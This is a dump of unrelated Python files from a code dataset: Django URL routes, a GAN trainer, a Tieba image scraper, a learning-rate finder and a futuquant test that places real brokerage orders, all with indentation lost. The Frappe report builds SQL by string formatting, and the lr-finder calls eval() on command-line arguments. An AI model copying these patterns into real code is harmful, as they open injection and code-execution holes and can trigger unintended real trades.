path('header', views.header, name='header'),
path('admin/', admin.site.urls),
path('api/', include('api.urls')),
path('account/register', views.register, name="register"),
path('account/', include('django.contrib.auth.urls')),
path('articles/', include('articles.urls')),
path('boards/', include('boards.urls')),
path('clans/', include('clans.urls')),
path('langs/', include('languages.urls')),
path('tools/', include('tools.urls')),
path('trans/', include('translations.urls')),
path('profile/', include('users.urls')),
]
|
StarcoderdataPython
|
138000
|
import unittest
from monty.multiprocessing import imap_tqdm
from math import sqrt
class FuncCase(unittest.TestCase):
def test_imap_tqdm(self):
results = imap_tqdm(4, sqrt, range(10000))
self.assertEqual(len(results), 10000)
self.assertEqual(results[0], 0)
self.assertEqual(results[400], 20)
self.assertEqual(results[9999], 99.99499987499375)
results = imap_tqdm(4, sqrt, (i ** 2 for i in range(10000)))
self.assertEqual(len(results), 10000)
self.assertEqual(results[0], 0)
self.assertEqual(results[400], 400)
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
3310777
|
n = int(input())
for i in range (n, 0, -1):
print (i)
|
StarcoderdataPython
|
3375212
|
# Copyright (c) 2013, Element Labs and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
def execute(filters=None):
sqlq = """select
q2.warehouse,
q1.coins_expected,
q1.coin_count,
q1.error,
q1.no_of_collections,
q2.number,
q1.avg_count from
(
select warehouse,count(name) as number from tabAsset GROUP BY warehouse
)q2
left join
(
select a.site,
SUM(a.coins_expected) as coins_expected,
SUM(b.coin_count) as coin_count,
SUM(b.error) as error,
COUNT(a.machine_number) as no_of_collections,
AVG(b.coin_count) as avg_count
from `tabCollection Entry` a
right join `tabCollection Counting` b
ON a.name = b.collection_entry
where a.creation BETWEEN '{}' AND '{}'
GROUP BY a.site
)q1
ON q1.site = q2.warehouse""".format(filters.from_date,filters.to_date)
columns = [
"Site:Link/Warehouse:200",
"Total Expected Coins:Int:100",
"Total Counted Coins:Int:100",
"Error:Int:100",
"No of Collections:Int:100",
"No of Machines:Int:100",
"AVG Coins per Collection:Float:100"
]
data = frappe.db.sql(sqlq,as_list=1)
return columns, data
|
StarcoderdataPython
|
3229328
|
import os, cv2
import copy
import torch
import torch.nn as nn
import torch.autograd as autograd
import numpy as np
import pandas as pd
import torch.optim as optim
import matplotlib.pyplot as plt
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR, StepLR
from utils import *
from losses.losses import *
class Trainer():
def __init__(self, loss_type, netD, netG, device, train_dl, lr_D = 0.0002, lr_G = 0.0002, resample = True, weight_clip = None, use_gradient_penalty = False, loss_interval = 50, image_interval = 50, save_img_dir = 'saved_images/'):
self.loss_type, self.device = loss_type, device
self.require_type = get_require_type(self.loss_type)
self.loss = get_gan_loss(self.device, self.loss_type)
self.netD = netD
self.netG = netG
self.train_dl = train_dl
self.lr_D = lr_D
self.lr_G = lr_G
self.train_iteration_per_epoch = len(self.train_dl)
self.device = device
self.resample = resample
self.weight_clip = weight_clip
self.use_gradient_penalty = use_gradient_penalty
self.special = None
self.optimizerD = optim.Adam(self.netD.parameters(), lr = self.lr_D, betas = (0, 0.9))
self.optimizerG = optim.Adam(self.netG.parameters(), lr = self.lr_G, betas = (0, 0.9))
self.real_label = 1
self.fake_label = 0
self.nz = self.netG.nz
self.fixed_noise = generate_noise(49, self.nz, self.device)
self.loss_interval = loss_interval
self.image_interval = image_interval
self.errD_records = []
self.errG_records = []
self.save_cnt = 0
self.save_img_dir = save_img_dir
if(not os.path.exists(self.save_img_dir)):
os.makedirs(self.save_img_dir)
def gradient_penalty(self, real_image, fake_image):
bs = real_image.size(0)
alpha = torch.FloatTensor(bs, 1, 1, 1).uniform_(0, 1).expand(real_image.size()).to(self.device)
interpolation = alpha * real_image + (1 - alpha) * fake_image
c_xi = self.netD(interpolation)
gradients = autograd.grad(c_xi, interpolation, torch.ones(c_xi.size()).to(self.device),
create_graph = True, retain_graph = True, only_inputs = True)[0]
gradients = gradients.view(bs, -1)
penalty = torch.mean((gradients.norm(2, dim=1) - 1) ** 2)
return penalty
def train(self, num_epoch):
for epoch in range(num_epoch):
for i, data in enumerate(tqdm(self.train_dl)):
self.netD.zero_grad()
real_images = data[0].to(self.device)
bs = real_images.size(0)
noise = generate_noise(bs, self.nz, self.device)
fake_images = self.netG(noise)
c_xr = self.netD(real_images)
c_xr = c_xr.view(-1)
c_xf = self.netD(fake_images.detach())
c_xf = c_xf.view(-1)
if(self.require_type == 0 or self.require_type == 1):
errD = self.loss.d_loss(c_xr, c_xf)
elif(self.require_type == 2):
errD = self.loss.d_loss(c_xr, c_xf, real_images, fake_images)
if(self.use_gradient_penalty != False):
errD += self.use_gradient_penalty * self.gradient_penalty(real_images, fake_images)
errD.backward()
self.optimizerD.step()
if(self.weight_clip != None):
for param in self.netD.parameters():
param.data.clamp_(-self.weight_clip, self.weight_clip)
self.netG.zero_grad()
if(self.resample):
noise = generate_noise(bs, self.nz, self.device)
fake_images = self.netG(noise)
if(self.require_type == 0):
c_xf = self.netD(fake_images)
c_xf = c_xf.view(-1)
errG = self.loss.g_loss(c_xf)
if(self.require_type == 1 or self.require_type == 2):
c_xr = self.netD(real_images)
c_xr = c_xr.view(-1)
c_xf = self.netD(fake_images)
c_xf = c_xf.view(-1)
errG = self.loss.g_loss(c_xr, c_xf)
errG.backward()
self.optimizerG.step()
self.errD_records.append(float(errD))
self.errG_records.append(float(errG))
if(i % self.loss_interval == 0):
print('[%d/%d] [%d/%d] errD : %.4f, errG : %.4f'
%(epoch+1, num_epoch, i+1, self.train_iteration_per_epoch, errD, errG))
if(i % self.image_interval == 0):
if(self.special == None):
sample_images_list = get_sample_images_list('Unsupervised', (self.fixed_noise, self.netG))
plot_img = get_display_samples(sample_images_list, 7, 7)
cur_file_name = os.path.join(self.save_img_dir, str(self.save_cnt)+' : '+str(epoch)+'-'+str(i)+'.jpg')
self.save_cnt += 1
cv2.imwrite(cur_file_name, plot_img)
elif(self.special == 'Wave'):
sample_audios_list = get_sample_images_list('Unsupervised_Audio', (self.fixed_noise, self.netG))
plot_fig = plot_multiple_spectrograms(sample_audios_list, 7, 7, freq = 16000)
cur_file_name = os.path.join(self.save_img_dir, str(self.save_cnt)+' : '+str(epoch)+'-'+str(i)+'.jpg')
self.save_cnt += 1
save_fig(cur_file_name, plot_fig)
plot_fig.clf()
|
StarcoderdataPython
|
3362913
|
<gh_stars>0
from cEnum import eAxes, eRect
from cConstants import cPlotConstants, cPlot2DConstants
import cPlot
import wx
from matplotlib.figure import Figure
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
class cPlotFrame(cPlot.cPlotFrame):
def __init__(self, iParent, **kwargs):
cPlot.cPlotFrame.__init__(self, iParent, **kwargs)
def initPanel(self, **kwargs):
self.m_PlotPanel = cPlotPanel(self, **kwargs)
class cPlotPanel(cPlot.cPlotPanel):
def __init__(self, iParent, **kwargs):
cPlot.cPlotPanel.__init__(self, iParent, **kwargs)
self.m_NumAxes = 2
self.m_Figure = Figure(figsize=self.getFigSize(),
facecolor=cPlotConstants.m_BackgroundColour, edgecolor=cPlotConstants.m_BackgroundColour)
self.m_Axes = self.m_Figure.add_axes(cPlot2DConstants.m_Rect)
self.m_Axes.set_xlim(self.m_XAxisMin, self.m_XAxisMax)
self.m_Axes.set_ylim(self.m_YAxisMin, self.m_YAxisMax)
'''
# Details of m_Rect, is described in cConstants.cPlot2DConstants
# This will be used for pretty panning, that is, panning the plot and making it look nice
# I will need to calculate the optimal stepping for the pixels
rect = cPlot2DConstants.m_Rect# [0.19, 0.13, 0.8, 0.79]
pixelLength_X_Axis = rect[eRect.fractionOfX] * self.GetSize()[0]
pixelLength_Y_Axis = rect[eRect.fractionOfY] * self.GetSize()[1]
self.m_OptimalXStep = 2.0 / pixelLength_X_Axis
self.m_OptimalYStep = 1.0 / pixelLength_Y_Axis
'''
self.m_Canvas = FigureCanvas(self, -1, self.m_Figure)
# Enables interactivity
self.m_Canvas.mpl_connect("motion_notify_event", self.onMouseMove)
self.m_Canvas.mpl_connect("button_press_event", self.onMousePress)
self.m_Canvas.mpl_connect("button_release_event", self.onMouseRelease)
self.m_Canvas.mpl_connect("key_press_event", self.onKeyPress)
self.m_Canvas.mpl_connect("scroll_event", self.onScroll)
def getFigSize(self):
x, y = self.GetSize()
x = x * cPlot2DConstants.m_FigRatioX
y = y * cPlot2DConstants.m_FigRatioY
return (x, y)
def plotScatter(self, iXData, iYData, iAutoScaling=False, iRedraw=False, iUpdate=True, **kwargs):
if (True == iRedraw):
self.clearAxes()
if (False == iAutoScaling):
tempXAxis = list(self.m_Axes.get_xlim())
tempYAxis = list(self.m_Axes.get_ylim())
self.m_Axes.scatter(iXData, iYData, **kwargs)
self.m_Axes.set_xlim(tempXAxis)
self.m_Axes.set_ylim(tempYAxis)
else:
self.m_Axes.scatter(iXData, iYData, **kwargs)
if (True == iUpdate):
self.redrawAxes()
def resetAxes(self):
self.m_Axes.set_xlim(cPlotConstants.m_DefaultXAxisMin, cPlotConstants.m_DefaultXAxisMax)
self.m_Axes.set_ylim(cPlotConstants.m_DefaultYAxisMin, cPlotConstants.m_DefaultXAxisMax)
self.updateAxesData()
self.redrawAxes()
def updateAxesData(self):
self.m_XAxisMin, self.m_XAxisMax = self.m_Axes.get_xlim()
self.m_YAxisMin, self.m_YAxisMax = self.m_Axes.get_ylim()
self.m_XAxisLength = (self.m_XAxisMin - self.m_XAxisMax)
self.m_YAxisLength = (self.m_YAxisMin - self.m_YAxisMax)
def onMousePress(self, iEvent):
if (iEvent.inaxes == self.m_Axes):
self.m_PreviousMouseX, self.m_PreviousMouseY = iEvent.xdata, iEvent.ydata
self.m_PreviousMouseXPixel, self.m_PreviousMouseYPixel = iEvent.x, iEvent.y
# modified from mpl.toolkits.mplot3d.axes3d._on_move
def onMouseMove(self, iEvent):
if (not iEvent.button):
return
currentMouseX, currentMouseY = iEvent.xdata, iEvent.ydata
currentMouseXPixel, currentMouseYPixel = iEvent.x, iEvent.y
# In case the mouse is out of bounds.
if (currentMouseX == None):
return
#diffMouseX = (currentMouseX - self.m_PreviousMouseX) * cPlot2DConstants.m_MouseDragSensitivity
#diffMouseY = (currentMouseY - self.m_PreviousMouseY) * cPlot2DConstants.m_MouseDragSensitivity
# panning
# 3 represents right click
if (cPlotConstants.m_MousePanButton == iEvent.button):
self.updateAxesData()
#diffMouseX *= cPlot2DConstants.m_PanSensitivity
#diffMouseY *= cPlot2DConstants.m_PanSensitivity
diffMouseX = currentMouseX - self.m_PreviousMouseX
diffMouseY = currentMouseY - self.m_PreviousMouseY
diffMouseXPixel = currentMouseXPixel - self.m_PreviousMouseXPixel
diffMouseYPixel = currentMouseYPixel - self.m_PreviousMouseYPixel
lengthX = abs(self.m_XAxisMax - self.m_XAxisMin)
lengthY = abs(self.m_YAxisMax - self.m_YAxisMin)
if (False == self.m_LockAxes[eAxes.xAxis]):
if (1 <= abs(diffMouseXPixel)):
shiftedX = diffMouseX * (1 / lengthX)
self.shiftXAxis(-shiftedX)
if (False == self.m_LockAxes[eAxes.yAxis]):
if (1 <= abs(diffMouseYPixel)):
shiftedY = diffMouseY * (1 / lengthY)
self.shiftYAxis(-shiftedY)
self.redrawAxes()
def zoomAxes(self, iZoomAmount):
self.updateAxesData()
diffX = (self.m_XAxisMax - self.m_XAxisMin) * (0.1 * iZoomAmount)
diffY = (self.m_YAxisMax - self.m_YAxisMin) * (0.1 * iZoomAmount)
self.m_Axes.set_xlim(self.m_XAxisMin + diffX, self.m_XAxisMax - diffX)
self.m_Axes.set_ylim(self.m_YAxisMin + diffY, self.m_YAxisMax - diffY)
self.redrawAxes()
def rescaleAxes(self):
# Recompute bounds
self.m_Axes.relim()
self.m_Axes.autoscale_view()
|
StarcoderdataPython
|
101769
|
<reponame>half-cambodian-hacker-man/lustre
#!/usr/bin/env python3
from run_dev import random_secret_key
random_secret_key()
from microblogging import app, DATABASE_URL
from sqlalchemy import create_engine
if __name__ == "__main__":
app.db.metadata.create_all(create_engine(str(DATABASE_URL)))
|
StarcoderdataPython
|
1746506
|
<reponame>ldolin/shixi0
"""
created by ldolin
"""
"""
1.xpath:
解析工具,用来在xml中查找信息的语言,同样适用于HTML文档的检索
2.辅助工具
Chrome插件:xpath helper
启动/关闭:ctrl+shift+x
3.匹配演示
1.查找bookstore下面所有节点:/bookstore
2.查找book下面所有节点://book
3.查找book下面所有title节点lang属性中为"en"的节点
//book/title[@lang="en"]
1.选取节点:
/:从根节点开始选取
//:从整个文档的某个路径开始选取
@:选取某个节点的属性
1.选取1个节点://title[@lang="en"]
2.选取n个节点://title[@lang]
3.选取文本值://title[@lang]/text()
4.匹配多路径:
1.符号:|
比如:
获取所有book下的title和author
//title[@lang]/text()|//author
4.安装HTML/xml解析库
1.安装lxml模块
2.使用
1.利用lxml库中etree模块构建解析对象
2.通过解析对象调用xpath工具定位节点信息
3.
1.导入from lxml import etree
2.创建解析parseHtml = etree.HTML(html)
3.调用xpath解析
r_list = parseHtml.xpath("//title[@lang='en']")
注意:只要调用xpath结果一定是列表
"""
from lxml import etree
import requests
import urllib.request
# import urllib
# //cc/div/img[@class="BDE_Image"]/@src
# //div[@class="threadlist_title pull_left j_th_tit"]/a/@href
# http://dq.tieba.com/p/6176197067
# https://tieba.baidu.com/f?kw=%E5%B0%8F%E5%83%B5%E5%B0%B8&ie=utf-8&pn=50
for i in range(1,7):
# ch = '小僵尸'
# p = (i - 1) * 50
# d1 = {
# 'kw': ch,
# 'pn': p
# }
# d = urllib.parse.urlencode(d1)
url = 'http://tieba.baidu.com/f?kw=%E5%B0%8F%E5%83%B5%E5%B0%B8&pn'+ str((i-1)*50)
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
}
# request = urllib.request.Request(url, headers=headers)
# response = urllib.request.urlopen(request)
#
# data = response.read().decode('utf-8')
# ,Content-Type='application/json'; charset='GBK'
response = requests.get(url,headers=headers)
response.encoding = "UTF-8"
# response.encoding = response.apparent_encoding
data1 = response.text
# http://tieba.baidu.com/p/4634297302
# data = data1.replace(r'<!--', '').replace(r'-->', '')
print(data1)
parseHtml = etree.HTML(data1)
# st = '//div[@class="t_con cleafix"]/div/div/div/a[@rel="noreferrer"]/@href'
# st1 = '//div[@class="threadlist_title pull_left j_th_tit "]/a/@href'
r_list1 = parseHtml.xpath('.//*[@class="threadlist_title pull_left j_th_tit"]/a[@rel="noreferrer"]/@href')
print(r_list1)
for j in r_list1:
url1 = 'http://tieba.baidu.com' + j
# request = urllib.request.Request(url, headers=headers)
# response = urllib.request.urlopen(request)
#
# data = response.read().decode('utf-8')
response = requests.get(url1, headers=headers)
response.encoding = "utf-8"
data = response.text
parseHtml = etree.HTML(data)
r_list2 = parseHtml.xpath('//cc/div/img[@class="BDE_Image"]/@src')
for k in r_list2:
response = requests.get(k, headers=headers)
response.encoding = "utf-8"
data = response.content
a = '第'+str(i)+ '页'+'第'+str(len(r_list1))+'个贴'+'第'+str(len(r_list2))+'个图.jpg'
with open(a, 'wb', encoding='utf-8') as f:
print('正在写入%s' % a)
f.write(data)
print('写入完成。。')
|
StarcoderdataPython
|
3378809
|
# -*- coding: utf-8 -*-
import torch
import numpy as np
import matplotlib.pyplot as plt
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
import math
from architectures import *
import argparse
from data_to_dict import get_data
from dataset import OurDataset
import os
import re
import shutil
from main import get_data_loader
parser = argparse.ArgumentParser(description='PyTorch Drive a car wohoo')
parser.add_argument('-a','--arch', default='', type=str, metavar='file.class',
help = 'Name of network to use. eg: LucaNetwork.LucaNet')
parser.add_argument('--shuffle', dest='shuffle', action='store_true',
help='Whether to shuffle training data or not. (default: False)')
parser.add_argument('--no-intention', dest='no_intention', action='store_true',
help='Set all intentions to 0. (default: False (aka keep intentions))')
parser.add_argument('-b', '--batch-size', default=16, type=int,
metavar='N', help='mini-batch size (default: 16)')
parser.add_argument('-e', '--epochs', default=10, type=int,
metavar='N', help='number of total epochs (default: 10)')
parser.add_argument('-p','--print-freq', default=100, type=int,
metavar='N', help='print frequency (default: 100)')
parser.add_argument('-pl', '--plot-freq', default=100, type=int,
metavar='N', dest='plot_freq', help='plot frequency (default: 100 batch)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='Name of folder in /media/annaochjacob/crucial/models/ ex \'SmallerNetwork1/checkpoint.pt\' ')
parser.add_argument('--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--scheduler', dest='scheduler', action='store_true',
help='Whether to manually adjust learning rate as we train. (https://sgugger.github.io/the-1cycle-policy.html)')
parser.add_argument('-d','--dataset', dest='dataset_path', default='',
type=str, metavar='PATH',
help = 'Name of folder in /media/annaochjacob/crucial/dataset/ ex \'Banana_split/\' (with trailing /)')
parser.add_argument('-s','--save-path', dest='save_path', default='',
type=str, metavar='PATH',
help = 'Name of folder in /media/annaochjacob/crucial/models/ ex \'SmallerNetwork1/\' (with trailing /)')
parser.add_argument('-o','--optim', default='SGD(model.parameters(), lr=1e-5, momentum=0.9, nesterov=True)', type=str,
metavar='name(model.parameters(), param**)',
help = 'optimizer and its param. Ex/default: \'SGD(model.parameters(), lr=1e-5, momentum=0.9, nesterov=True)\' )')
parser.add_argument('-pf', '--past-frames', default=0, type=int, dest='past_frames',
metavar='N', help='Number of past lidar frames provided to the network (For RNN it is bptt) (default: 0)')
parser.add_argument('-fs', '--frame-stride', default=1, type=int, dest='frame_stride',
metavar='N', help='Stride of past frames. Ex. past-frames=2 and frames-stride=2 where x is current frame'\
'\n gives x, x-2, x-4. (default: 1)')
parser.add_argument('-mpf','--manual_past_frames', default=None, type=str, metavar='\'1 2 3\'',
help = 'If not use past_frames and frames-stride, list which frames you want manually. Ex: \'1 3 5 7 10 13 16\''\
'NOTE: Not applicable for RNNs!! Use -pf and -fs flags instead.')
parser.add_argument('-bptt', '--bptt', default=1, type=int, dest='bptt',
metavar='N', help='Back propagation through time. Option only available for RNNs. (default = 1)')
# NOTE: Currently we find all rnns by doing regex. If this changes to be true, add this argument.
parser.add_argument('-rnn', '--rnn', dest='rnn', action='store_true',
help='Wheter we have an rnn or not. (not needed if arch str contains \'rnn\')')
parser.add_argument('-bl', '--balance', dest='balance', action='store_true',
help='Balance dataset by sampling with replacement. Not applicable for RNNs. Forces shuffle to True in training set.')
#TODO: data_to_dict, dataset, main.
# save, load,
args = parser.parse_args()
PATH_BASE = '/media/annaochjacob/crucial/'
PATH_RESUME = PATH_BASE + 'models/' + args.resume
PATH_SAVE = PATH_BASE + 'models/' + args.save_path
if not os.path.exists(PATH_SAVE):
os.makedirs(PATH_SAVE)
PATH_DATA = PATH_BASE + 'dataset/' + args.dataset_path
NUM_WORKERS = 3
PIN_MEM = False
if args.manual_past_frames:
args.manual_past_frames = [int(i) for i in args.manual_past_frames.split(' ')]
rnn_arch_match = re.search('RNN', args.arch, flags=re.IGNORECASE)
if rnn_arch_match is not None:
args.rnn = True
def find_lr(net, trn_loader, optimizer, criterion, init_value = 1e-8, final_value=10., beta = 0.98, sampler_max = None):
if sampler_max is not None:
num = int(sampler_max/args.batch_size) + 1
else:
num = len(trn_loader)-1
mult = (final_value / init_value) ** (1/num)
lr = init_value
optimizer.param_groups[0]['lr'] = lr
avg_loss = 0.
best_loss = 0.
batch_num = 0
losses = []
log_lrs = []
print(len(trn_loader))
for batch in trn_loader:
batch_num += 1
#As before, get the loss for this mini-batch of inputs/outputs
lidars = Variable((batch['lidar']).type(torch.cuda.FloatTensor))
values = Variable((batch['value']).type(torch.cuda.FloatTensor))
targets = Variable((batch['output']).type(torch.cuda.FloatTensor))
optimizer.zero_grad()
outputs = net(lidars,values)
loss = criterion(outputs, targets)
#Compute the smoothed loss
avg_loss = beta * avg_loss + (1-beta) *loss.data[0]
smoothed_loss = avg_loss / (1 - beta**batch_num)
#Stop if the loss is exploding
if batch_num > 1 and smoothed_loss > 1000 * best_loss:
return log_lrs, losses
#Record the best loss
if smoothed_loss < best_loss or batch_num==1:
best_loss = smoothed_loss
#Store the values
losses.append(smoothed_loss)
log_lrs.append(math.log10(lr))
#Do the SGD step
loss.backward()
optimizer.step()
#Update the lr for the next step
lr *= mult
optimizer.param_groups[0]['lr'] = lr
if batch_num % 10 == 0:
print('Batch: %i \tLoss: %.3f \tlr: %.3e' %(batch_num,smoothed_loss,lr))
return log_lrs, losses
def main():
#write info file
if not os.path.exists(PATH_SAVE):
os.makedirs(PATH_SAVE)
write_info_file()
for i in range(1):
model = eval(args.arch + "()")
model.cuda()
if not args.rnn:
sampler_max = 100000
else:
sampler_max = None
trn_loader = get_data_loader(PATH_DATA + 'train/', shuffle=args.shuffle, balance=args.balance, sampler_max = sampler_max)
optimizer = eval('torch.optim.' + args.optim)
criterion = torch.nn.MSELoss().cuda()
log_lrs, losses = find_lr(model, trn_loader, optimizer, criterion, sampler_max = sampler_max)
plt.plot(log_lrs,losses)
#plt.show()
plt.savefig(PATH_SAVE + 'lr_finder.png')
write_loss_file(log_lrs, losses)
def write_loss_file(log_lrs, losses):
np.savetxt(PATH_SAVE + "log_lrs.txt", log_lrs, comments='', delimiter=',',fmt='%.8f')
np.savetxt(PATH_SAVE + "losses.txt", losses, comments='', delimiter=',',fmt='%.8f')
def write_info_file():
info = ""
for key in args.__dict__:
info += str(key) + " : " + str(args.__dict__[key]) + "\n"
file = open(PATH_SAVE + "info.txt", "w")
file.write(info)
file.close()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
163883
|
<gh_stars>0
from django.db.models import Model
|
StarcoderdataPython
|
94601
|
"""URL Configuration"""
from django.urls import path, include
from . import views
from rest_auth.views import LogoutView
urlpatterns = [
path('user/', views.UserDetailsAPIView.as_view(), name='rest_user_details'),
path('login/', views.LoginUserView.as_view(), name='account_login'),
path('password/change/', views.PasswordUserChangeView.as_view(), name='rest_password_change'),
path('password/reset/', views.PasswordResetUserView.as_view(), name='rest_password_reset'),
path('', include('rest_auth.urls')),
path('registration/', views.RegisterUserView.as_view(), name='account_signup'),
path('rest-auth/registration/', include('rest_auth.registration.urls')),
path('account-confirm-email/<str:key>/', views.VerifyUserEmailView.as_view(), name='account_confirm_email'),
path('password/reset/confirm/<str:uid>/<str:token>/', views.PasswordResetConfirmUserView.as_view(), name='rest_password_reset_confirm'),
path('logout/', LogoutView.as_view(), name='rest_logout'),
]
|
StarcoderdataPython
|
1722088
|
<reponame>hxhxhx88/futuquant
#-*-coding:utf-8-*-
from futuquant import *
import pandas
class ALLApi(object):
#上线前测试用例,遍历所有接口保证可执行
def __init__(self):
pandas.set_option('max_columns',100)
pandas.set_option('display.width',1000)
self.host = '127.0.0.1'
self.port = 11111
self.subTypes = [SubType.QUOTE, SubType.ORDER_BOOK, SubType.BROKER, SubType.TICKER, SubType.RT_DATA, SubType.K_1M,
SubType.K_5M, SubType.K_15M, SubType.K_30M, SubType.K_60M, SubType.K_DAY, SubType.K_WEEK,
SubType.K_MON]
def test_quotation(self):
#所有行情的同步接口
quote_ctx = OpenQuoteContext(self.host, self.port)
print('获取报价 get_stock_quote')
print(quote_ctx.get_stock_quote(code_list = ['HK.00700','HK.62423','HK.800000','US.AAPL','SH.601318','SH.000001','SZ.000001']))
print('获取逐笔 get_rt_ticker')
print(quote_ctx.get_rt_ticker(code= 'HK.00388',num=1000))
print(quote_ctx.get_rt_ticker(code='US.MSFT', num=1000))
print(quote_ctx.get_rt_ticker(code='SH.601998', num=1000))
print('获取实时K线 get_cur_kline')
print(quote_ctx.get_cur_kline(code = 'HK.00772', num=1000, ktype=SubType.K_5M, autype=AuType.QFQ))
print(quote_ctx.get_cur_kline(code='US.FB', num=500, ktype=SubType.K_DAY, autype=AuType.HFQ))
print(quote_ctx.get_cur_kline(code='SZ.000885', num=750, ktype=SubType.K_WEEK, autype=AuType.NONE))
print('获取摆盘 get_order_book')
print(quote_ctx.get_order_book(code = 'HK.01810'))
print(quote_ctx.get_order_book(code='US.AMZN'))
print('获取分时数据 get_rt_data')
print(quote_ctx.get_rt_data(code = 'HK.01357'))
print(quote_ctx.get_rt_data(code='US.MDR'))
print(quote_ctx.get_rt_data(code='SZ.000565'))
print('获取经纪队列 get_broker_queue')
print(quote_ctx.get_broker_queue(code = 'HK.01478'))
print('订阅 subscribe')
print(quote_ctx.subscribe(code_list = ['HK.00700','US.AAPL'], subtype_list =self.subTypes))
print('查询订阅 query_subscription')
print(quote_ctx.query_subscription(is_all_conn=True))
print('获取交易日 get_trading_days')
print(quote_ctx.get_trading_days(market = Market.HK, start_date=None, end_date=None))
print('获取股票信息 get_stock_basicinfo')
print(quote_ctx.get_stock_basicinfo(market = Market.HK, stock_type=SecurityType.STOCK, code_list=None))
print(quote_ctx.get_stock_basicinfo(market=Market.HK, stock_type=SecurityType.WARRANT, code_list=None))
print(quote_ctx.get_stock_basicinfo(market=Market.US, stock_type=SecurityType.STOCK, code_list=None))
print('获取复权因子 get_autype_list')
print(quote_ctx.get_autype_list(code_list = ['HK.00700','US.AAPL','SZ.300104']))
print('获取市场快照 get_market_snapshot')
print(quote_ctx.get_market_snapshot(code_list = ['HK.00700','US.AAPL','SZ.300104']))
print('获取板块集合下的子板块列表 get_plate_list')
print(quote_ctx.get_plate_list( market = Market.HK, plate_class = Plate.ALL))
print(quote_ctx.get_plate_list(market=Market.US, plate_class=Plate.ALL))
print(quote_ctx.get_plate_list(market=Market.SH, plate_class=Plate.ALL))
print('获取板块下的股票列表 get_plate_stock')
print(quote_ctx.get_plate_stock(plate_code = 'HK.BK1160'))
print(quote_ctx.get_plate_stock(plate_code='SH.BK0045'))
print('获取牛牛程序全局状态 get_global_state')
print(quote_ctx.get_global_state())
print('获取历史K线 get_history_kline')
print(quote_ctx.get_history_kline(code='HK.02689',start=None,end=None,ktype=KLType.K_DAY,autype=AuType.QFQ,fields=[KL_FIELD.ALL]))
print(quote_ctx.get_history_kline(code='US.NSP', start=None, end=None, ktype=KLType.K_MON, autype=AuType.HFQ,fields=[KL_FIELD.ALL]))
print(quote_ctx.get_history_kline(code='SZ.300601', start=None, end=None, ktype=KLType.K_WEEK, autype=AuType.NONE,fields=[KL_FIELD.ALL]))
print('获取多支股票多个单点历史K线 get_multi_points_history_kline')
print(quote_ctx.get_multi_points_history_kline(code_list = ['HK.00700','US.JD','SH.000001'],dates=['2018-01-01', '2018-08-02'],fields=KL_FIELD.ALL,ktype=KLType.K_15M,autype=AuType.HFQ,no_data_mode=KLNoDataMode.BACKWARD))
quote_ctx.close()
def test_quotation_async(self):
#所有行情的异步接口
quote_ctx = OpenQuoteContext(self.host, self.port)
quote_ctx.start()
# 设置监听
handlers = [CurKlineTest(),OrderBookTest(),RTDataTest(),TickerTest(),StockQuoteTest(),BrokerTest()]
for handler in handlers:
quote_ctx.set_handler(handler)
# 订阅
codes = ['HK.00700','HK.62423','HK.800000','US.AAPL','SH.601318','SH.000001','SZ.000001']
quote_ctx.subscribe(code_list = codes, subtype_list = self.subTypes)
time.sleep(5*60) #订阅5分钟
quote_ctx.stop()
quote_ctx.close()
def test_trade(self,tradeEnv = TrdEnv.REAL):
#交易
trade_hk = OpenHKTradeContext(self.host, self.port)
trade_us = OpenUSTradeContext(self.host, self.port)
if tradeEnv == TrdEnv.REAL:
trade_cn = OpenHKCCTradeContext(self.host, self.port) #A股通
else:
trade_cn = OpenCNTradeContext(self.host, self.port) #web模拟交易
print('交易环境:',tradeEnv)
#解锁交易unlock
trade_pwd = '<PASSWORD>'
print('HK解锁交易',trade_hk.unlock_trade(trade_pwd))
print('US解锁交易', trade_us.unlock_trade(trade_pwd))
print('CN解锁交易', trade_cn.unlock_trade(trade_pwd))
# 设置监听
handler_tradeOrder = TradeOrderTest()
handler_tradeDealtrade = TradeDealTest()
trade_hk.set_handler(handler_tradeOrder)
trade_hk.set_handler(handler_tradeDealtrade)
trade_us.set_handler(handler_tradeOrder)
trade_us.set_handler(handler_tradeDealtrade)
trade_cn.set_handler(handler_tradeOrder)
trade_cn.set_handler(handler_tradeDealtrade)
# 开启异步
trade_hk.start()
trade_us.start()
trade_cn.start()
# 下单 place_order
price_hk = 5.96
qty_hk = 500
code_hk = 'HK.1357'
price_us = 36.28
qty_us = 2
code_us = 'US.JD'
price_cn = 8.94
qty_cn = 100
code_cn = 'SZ.000001'
for i in range(3):
#港股普通订单-买入
print('港股普通订单-买入')
print(trade_hk.place_order(price=price_hk - i, qty=qty_hk * i,
code=code_hk,
trd_side=TrdSide.BUY,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
#港股普通订单-卖出
print('港股普通订单-卖出')
print(trade_hk.place_order(price=price_hk - i, qty=qty_hk * i,
code=code_hk,
trd_side=TrdSide.SELL,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
#美股普通订单-买入
print('股普通订单-买入')
print(trade_us.place_order(price=price_us - i, qty=qty_us * i,
code=code_us,
trd_side=TrdSide.BUY,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
# 美股普通订单-卖出
print('股普通订单-卖出')
print(trade_us.place_order(price=price_us + i, qty=qty_us * i,
code=code_us,
trd_side=TrdSide.SELL,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
#A股普通订单-买入
print('A股普通订单-买入')
print(trade_cn.place_order(price=price_cn + i, qty=qty_cn * i,
code=code_cn,
trd_side=TrdSide.SELL,
order_type=OrderType.NORMAL,
adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
print('A股普通订单-卖出')
print(trade_cn.place_order(price=price_cn + i, qty=qty_cn * i,
code=code_cn,
trd_side=TrdSide.SELL,
